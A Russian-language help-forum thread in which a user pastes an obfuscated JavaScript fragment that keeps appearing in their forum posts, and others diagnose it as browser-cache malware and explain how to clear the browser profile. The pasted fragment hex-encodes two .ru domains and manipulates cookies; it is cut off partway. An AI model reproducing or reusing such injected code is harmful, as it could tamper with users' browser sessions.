Вирус? - вопрос №1571150

Доброго времени суток. Подскажите пожалуйста. На одном форуме у меня возникает проблема при написании сообщений. Как только я отправляю сообщение в нем появляется вот такое: window.a1336404323 = 1;!function(){var o=JSON.parse('[«6e33646b337a72372e7275»,«673333746d3079792e7275»]'),e="",t=«6349»,n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=«3600»;!t.expires&&r&&(t.expires=«3600»),e=encodeURIComponent(e);var c=o+"="+e;for и т.п...

Тех. админ форума говорит, что скорей всего это вирус. Появляются данные исключительно на этом форуме. Чистил компьютер от вирусов Dr. Web, но видно не помогло. Как это можно убрать?

Ответы

А на других форумах не пробовали отправить сообщение? Вполне возможно что это такой форум и админу просто лень разбираться с проблемами.Проверьте как отправляются сообщения на другом форуме.
Ну вот не всё прочитал (( появляются только на этом форуме, вам самому не кажется что это глюк форума, такого быть не может что везде всё нормально отправляете а на этом форуме вирус. Можете проверить компьютер AVZ и доктор веб утилита Dr.Web CureIT
1 — это вирус, видно по коду — ищет куки и модифицирует их. на данном форуме он просто ломается

чаще всего вирусы палятся именно на собственных ошибках

2 — сидит в кеше браузера. сохраните избранное и пароли, после чего полностью очитстите кеш браузера. если не поможет — удалите профиль браузера, он создаст чистый профиль при следующем запуске. переустанавливать браузер не надо

профиль фаерфокса — C:\Users\имя пользователя\AppData\Roaming\Mozilla\ и C:\Users\имя пользователя\AppData\Local\Mozilla\

хрома — C:\Users\имя пользователя\AppData\Local\Google\

другие браузеры искать в этих же папках — C:\Users\имя пользователя\AppData\Roaming\ и C:\Users\имя пользователя\AppData\Local\

Глеб Черняк